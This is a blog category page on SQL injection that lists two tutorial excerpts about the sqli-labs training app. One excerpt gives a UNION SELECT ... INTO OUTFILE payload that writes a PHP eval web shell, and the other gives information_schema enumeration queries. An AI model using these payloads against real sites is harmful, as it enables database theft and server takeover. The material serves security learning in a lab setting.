![](https://img-blog.csdnimg.cn/20201014180756923.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
sql注入
文章平均质量分 84
lkw23333
御天之骑,铭刻编年,此时此刻,正乃极致之时。
展开
-
sql注入——day02
sqli_labs 7 1.直接用?id='判断是否有注入点,如果返回数据库错误则可以注入。 2.同样用之前的方法不断测试发现id被((''))包裹 3. http://127.0.0.1/sqli/Less-7/?id=1')) order by 3--+ 查看有多少列 4. http://127.0.0.1/sqli/Less-7/?id=-1')) union select 1,2,'<?php @eval($_POST[“crow”]);?>' into outfile "C:\\php原创 2021-10-11 17:43:27 · 132 阅读 · 0 评论 -
sql注入——day01
基本的 查库:select schema_name from information_schema.schemata 查表:select table_name from information_schema.tables wheretable_schema = '数据库名' 查列:select column_name from information_schema.columns wheretable_name='表名' 查字段:select 字段名 form 数据库.表名 记得加注释符-- + .原创 2021-10-13 16:31:34 · 115 阅读 · 0 评论